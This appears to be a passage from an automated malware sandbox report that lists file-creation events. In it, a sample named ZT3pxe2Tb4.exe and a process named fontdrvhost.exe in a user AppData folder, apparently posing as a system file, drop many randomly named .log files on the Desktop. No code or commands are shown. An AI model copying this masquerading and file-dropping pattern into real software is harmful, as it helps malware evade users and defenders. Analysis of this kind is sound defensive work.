Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\hRSCUTxn.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CgRzmzKC.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\HuSZzPsz.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\LovAYRCw.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\inkviYhq.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\pzYaRqdW.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\piqUgtXk.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\hJcmyZDP.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\eCwwaQCH.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\QkEpPQey.log
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\tAOrkGQb.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\qiKKKJQB.log
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\lThKWNPp.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\cnAeDqUL.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ELDRalsN.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\oTDkKMId.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\IdUqmnRm.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ipFMCTyG.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\DACRVJoK.log
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\IbKgwPay.log
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\avWEvUWS.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ldamqVhj.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YsHvxEyH.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KWVhlfdm.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aABfDneW.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YnJNkaiG.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KOmOGvDg.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zldaSYtH.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\FvSbvlyH.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\mbeUnBPt.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MLVQXpXH.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\NmOPODYO.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\JavyIngh.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YBjETBXN.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\pntLeisv.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KszgdGmQ.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aLYWFcdp.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fuaVjmBB.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\VPWFywnw.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\pMKkuPam.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\JvAHRkKP.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\XzKOkXsR.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\VWGgLdif.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YVGePHcW.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\DQsQlVoZ.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\lCADkPID.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\HlvZPcYC.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CTQIQVae.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\GspafaHt.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CdkYHFFH.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RraOLYZw.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TORFqFIZ.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TWBYVoif.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zntiAIEO.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\dbVNVLdb.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\maCuLVwe.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\wOXBumXW.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RRcFiATg.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\THFECrua.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TlbPEPXm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\rrvChBIx.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\GGiHtSpS.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ZbufrXkm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\qguCdZEu.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\dabMNWxu.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ouGCZwUD.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\DEcjsSrF.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MTLhtkSf.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\cixmEAyA.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\DdBAnNSZ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\UOaorzbP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\xgyKnYKq.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\gmudUmpb.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\PwAgeDiA.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OnJqPAWm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\QfCxRbIn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\NMMXsbef.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\rmtKjMmm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MPlPWbPk.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RMaOjKxV.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\AFOsBjYP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OjpXkDnJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\XEIwxBIS.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MHvzAhUM.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\rAfUMkjC.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\oQWKeSDj.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WYfWtHNc.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RCCOzYeY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\GPSaXBQY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\iJlVzTXF.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\HxFJRUCD.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ifAdEpGk.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\IHwzgXOR.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\COTaDrJc.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\kdNuDPIk.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\pJXAdKPi.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\xkYbKhNl.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\xHZssejW.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\phJkSByL.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\qiEMTywj.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\kMzdwiuP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\lHCvjEeO.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\blWejAjG.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\XzFFzMmI.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\NWMxEuQr.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\mCNvXUiC.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\XFfNnXVZ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ZklVGaxA.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\FWzHsBqG.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OEWHVhjH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\NgoGZspx.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\iANVPgEI.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\xvPIrmGV.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\nJvbxzCb.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\tqrrAUxf.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\PEqxAxdY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\JAxqeOaQ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OemrfNDp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TCIWpNeY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\IiRYzRio.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YUSxJEkf.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zfzIrCEh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\SbqYhYfr.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\SdGfOIqy.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\LtTWIWgh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TYRgCYum.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aVjDvRpd.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MMDorhKp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\JfyqGcCs.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WgOpYqoh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KjbhtTTT.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\kQZvTrxL.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ylQifTUJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aFyNQRuY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\sihlzJJp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WzsNMHNJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uHokLZDZ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zReaumVj.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\kUpuTdpn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uvZrYWTP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\jECTfuuL.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\DnshUSLJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ULtOMFWU.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\iKNvbzqU.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\msUTDNPI.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\zsrQNmVQ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uJzjHyIX.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\dKmMwLxf.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fqGCEpSY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OzZYIDTF.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\FWXhQVXq.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\QpCXcuuA.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\SKewgrff.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\sXAbZyyE.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\wHLAFYKX.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\sQxsIGwX.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\nHlSHaLn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fyqViYtd.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\sYhLnqXd.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\XxwvJouT.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KnZYovDz.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zuGjoWSN.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fvxnZIOH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\inpEUjnz.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\XsyMwKeS.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\dpYUmTzI.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\mJblSiJK.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OgxpbmIn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\rudcNvNr.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\wsOrhbIJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\hsmnhNDB.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ORiFVhtH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ZtZwWUdP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CQeYyQPa.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zzDSBAiP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ikDUDecv.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WuogHSdp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YOQFKOOU.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\DnshUSLJ.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\tAOrkGQb.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\SKewgrff.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\IbKgwPay.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\zsrQNmVQ.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\pJXAdKPi.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\XxwvJouT.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\wHLAFYKX.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\lThKWNPp.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\dpYUmTzI.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\tqrrAUxf.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\tIxJOpqh.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\qxbJOXLg.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\avWEvUWS.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\RMCoLrQk.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\PCgnLZlk.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\xvPIrmGV.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\nHlSHaLn.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\XFfNnXVZ.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\NWMxEuQr.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\THFECrua.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\LtTWIWgh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MPlPWbPk.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CgRzmzKC.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\kUpuTdpn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\blWejAjG.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RCCOzYeY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ylQifTUJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\hezDLgou.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\NMMXsbef.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uvZrYWTP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\cixmEAyA.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KWVhlfdm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\pzYaRqdW.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YsHvxEyH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\oTDkKMId.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KOmOGvDg.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\kdNuDPIk.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\auteTnDC.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RMaOjKxV.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\IiRYzRio.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WzsNMHNJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\gmudUmpb.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KjbhtTTT.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CGTrJaEm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\sXAbZyyE.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aLYWFcdp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ORiFVhtH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\phJkSByL.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fyqViYtd.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\VPWFywnw.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\NmOPODYO.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fqGCEpSY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OjpXkDnJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ntFcgnCN.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\dKmMwLxf.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\UbSwNisy.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KszgdGmQ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CQeYyQPa.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\jECTfuuL.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aVjDvRpd.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RraOLYZw.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zfzIrCEh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\FWzHsBqG.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\pMKkuPam.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\feqUKmVF.log Jump to dropped file
